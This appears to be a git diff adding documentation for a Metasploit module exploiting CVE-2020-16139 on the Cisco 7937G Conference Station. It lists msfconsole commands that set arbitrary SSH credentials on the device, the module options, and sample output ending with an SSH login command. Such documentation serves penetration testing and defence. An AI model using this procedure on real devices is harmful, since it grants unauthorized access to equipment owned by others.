parent
8fe7417d1b
commit
1e244ddaec
|
@ -0,0 +1,44 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
1. Obtain a Cisco 7937G Conference Station.
|
||||||
|
2. Enable Web Access and SSH Access on the device.
|
||||||
|
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
|
||||||
|
3. Do: `set RHOSTS 192.168.1.10`
|
||||||
|
4. Do: `set USER test`
|
||||||
|
5. Do: `set PASS test`
|
||||||
|
6. Do: `run`
|
||||||
|
7. The conference station's SSH service should now be configured with the supplied USER:PASS.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
1. PASS (required) - Desired password
|
||||||
|
2. RHOSTS (required) - Target addres
|
||||||
|
3. THREADS (default 1, required) - The number of concurrent threads (max one per host)
|
||||||
|
4. TIMEOUT (default 5, required) - Timeout in seconds before aborting
|
||||||
|
5. USER (required) - Desired username
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
#### Successful Scenario
|
||||||
|
```
|
||||||
|
[*] Running for 192.168.110.209...
|
||||||
|
[*] 192.168.110.209 - Attempting to set SSH credentials.
|
||||||
|
[*] 192.168.110.209 - SSH attack finished!
|
||||||
|
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
|
||||||
|
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
|
||||||
|
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Unsuccessful Scenario
|
||||||
|
```
|
||||||
|
[*] Running for 192.168.110.209...
|
||||||
|
[*] 192.168.110.209 - Attempting to set SSH credentials.
|
||||||
|
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
Loading…
Reference in New Issue